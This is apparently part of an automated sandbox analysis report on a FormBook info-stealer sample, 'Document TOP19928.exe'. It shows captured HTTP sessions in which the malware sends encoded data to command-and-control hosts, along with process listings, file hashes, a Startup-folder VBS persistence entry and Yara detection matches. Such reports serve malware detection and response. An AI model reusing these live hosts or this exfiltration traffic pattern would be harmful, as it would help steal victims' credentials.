Jun 26, 2024 14:58:42.535451889 CEST	1236	IN	Data Raw: 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f Data Ascii: rver&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">  CMS</strong><p class="b-te
Jun 26, 2024 14:58:42.535482883 CEST	1236	IN	Data Raw: 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 20 62 2d 62 75 74 74 6f 6e 5f 74 65 Data Ascii: tton_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_build&reg_source=parking
Jun 26, 2024 14:58:42.535517931 CEST	1236	IN	Data Raw: 6e 62 73 70 3b d0 b7 d0 bb d0 be d1 83 d0 bc d1 8b d1 88 d0 bb d0 b5 d0 bd d0 bd d0 b8 d0 ba d0 be d0 b2 21 20 d0 9a d1 80 d0 be d0 bc d0 b5 20 d1 82 d0 be d0 b3 d0 be 2c 20 d0 b2 d1 8b 26 6e 62 73 70 3b d0 bf d0 be d0 b2 d1 8b d1 81 d0 b8 d1 82 Data Ascii: nbsp;! ,       SEO-.</p></div></
Jun 26, 2024 14:58:42.535550117 CEST	1236	IN	Data Raw: 61 69 6e 5f 64 61 74 61 3f 64 6f 6d 61 69 6e 5f 6e 61 6d 65 3d 77 77 77 2e 62 33 30 31 2e 73 70 61 63 65 26 72 61 6e 64 3d 27 20 2b 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2b 20 27 26 63 61 6c 6c 62 61 63 6b 3d 6f 6e 64 61 74 61 27 3b 0a 20 Data Ascii: ain_data?domain_name=www.b301.space&rand=' + Math.random() + '&callback=ondata'; script.async = 1; head.appendChild( script );</script><script>if ( 'www.b301.space'.match( /xn--/ ) && document.querySelectorAll ) { var s
Jun 26, 2024 14:58:42.535588026 CEST	810	IN	Data Raw: 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 67 74 61 67 28 27 6a Data Ascii: indow.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]\|\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	65263	154.215.72.110	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:50.604423046 CEST	517	OUT	GET /fo8o/?Y8F=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&9brL_=BThPe0S0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 26, 2024 14:58:51.511838913 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Jun 2024 12:58:51 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	65264	202.172.28.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:56.538496017 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 48 50 75 37 52 67 5a 78 70 4d 5a 42 33 6f 64 4f 69 33 58 66 51 36 33 6a 67 67 56 65 72 38 4c 57 2b 46 67 66 30 67 3d Data Ascii: Y8F=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffHPu7RgZxpMZB3odOi3XfQ63jggVer8LW+Fgf0g=
Jun 26, 2024 14:58:57.541126013 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:58:57 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Jun 26, 2024 14:58:57.545012951 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:58:57 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	65265	202.172.28.202	80	7152	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:58:59.069674969 CEST	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 57 50 7a 7a 6f 69 50 62 64 69 4d 64 56 51 42 6a 31 6e 33 4a 45 66 74 32 58 61 41 2b 64 63 58 38 4a 67 4f 44 63 4b Data Ascii: Y8F=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwWPzzoiPbdiMdVQBj1n3JEft2XaA+dcX8JgODcK
Jun 26, 2024 14:58:59.869091034 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:58:59 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	65266	202.172.28.202	80

Timestamp	Bytes transferred	Direction	Data
Jun 26, 2024 14:59:01.944926977 CEST	1818	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 59 38 46 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 49 2f 41 58 64 75 46 43 7a 61 5a 47 4f 43 68 30 6b 56 4e 50 56 79 48 2b 4a 37 4b 6a 68 4a 72 62 51 53 6f 77 33 6e 57 61 59 70 4f 4c 64 62 47 57 4e 35 33 62 36 78 63 2f 71 49 46 6a 49 4d 77 72 79 48 7a 4c 57 51 75 78 6f 61 55 55 4a 6f 6d 4f 45 51 35 34 79 4b 39 63 42 55 6e 31 47 63 4e 34 31 46 70 2f 44 4d 73 43 38 44 4e 6c 7a 54 73 71 6c 33 59 58 64 63 4f 77 63 70 73 52 61 73 61 62 4b 43 68 56 70 64 4e 75 45 7a 66 59 53 7a 74 41 47 48 49 6d 65 76 6a 77 69 71 35 39 51 79 4e 64 36 32 62 69 [TRUNCATED] Data Ascii: Y8F=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLI/AXduFCzaZGOCh0kVNPVyH+J7KjhJrbQSow3nWaYpOLdbGWN53b6xc/qIFjIMwryHzLWQuxoaUUJomOEQ54yK9cBUn1GcN41Fp/DMsC8DNlzTsql3YXdcOwcpsRasabKChVpdNuEzfYSztAGHImevjwiq59QyNd62bitKpXw4Rg4jW10WzlGrck9QbkLhOrwwFuohgJWuuRqDV8voiIwA29At+yaUGM6yP6vu/0a+4CZFGE11s0B26YXjF//VH3i5bdFjKUb3A20hS3j0T0CCq9YLRVVKtl1oU8j6UHNpmM4oz9Er01tsuaeUjxLRCB1w84PExCaXE7jb1XkDCHd9EK4WthUtVTh89vZWx0KsP/FXW34R8C+k7tgBa2J/Y0eWo53WPxM6Rk645nfAQyaRy1hGK2pKWbHo6y/s8DfpxP80Kb8it05P2F8enU3hgmLBgzr7GvZSxJunni/FbAymEaTiYVQfmgSXq99cZ76AIASeWMHjW/8LJdKb9Jm4BQuv9GRC8CXNo4vrZ9InyWuWR/iph/tUGB5lWEfVrH5eKoUxXkELQmAsHzlTaUE7TovkiSqNa/+eElMxNCBpuRvVlR9i1tHAwFrK2lzPv5cB6vcIEq7pDOoZIFkUTHbX1PJYMmV5Snxc3aEm2KwZE3F38bdFpfo99gYj76X22riFCwnxVafb55oq+SNf2DPczZon++pNp2vve/wNHyG700fxGhVFXf/l69XEDvJJ9jPySR1Hbm3Z/YtJmD4rBYWHxdbRQKdJcfs4UtM73s4SVtPl6k5OQnMWo74AyL/Zmy7d01X8cmvGMsy6AFwLv5dtC78HfgEv [TRUNCATED]
Jun 26, 2024 14:59:02.906375885 CEST	360	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Jun 2024 12:59:02 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Target ID:	0
Start time:	08:54:51
Start date:	26/06/2024
Path:	C:\Users\user\Desktop\Document TOP19928.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Document TOP19928.exe"
Imagebase:	0x7d0000
File size:	752'128 bytes
MD5 hash:	9503C5E38CC3212777D0F35AD86AD949
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:54:52
Start date:	26/06/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Document TOP19928.exe"
Imagebase:	0x7d0000
File size:	752'128 bytes
MD5 hash:	9503C5E38CC3212777D0F35AD86AD949
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:54:53
Start date:	26/06/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Document TOP19928.exe"
Imagebase:	0x1b0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:55:00
Start date:	26/06/2024
Path:	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe"
Imagebase:	0xdb0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	08:55:02
Start date:	26/06/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x930000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:55:06
Start date:	26/06/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0x7ff73f470000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:55:06
Start date:	26/06/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x7d0000
File size:	752'128 bytes
MD5 hash:	9503C5E38CC3212777D0F35AD86AD949
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:55:07
Start date:	26/06/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x1b0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:55:16
Start date:	26/06/2024
Path:	C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe"
Imagebase:	0xdb0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:55:28
Start date:	26/06/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	46

Executed Functions

Function 007D3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B7A
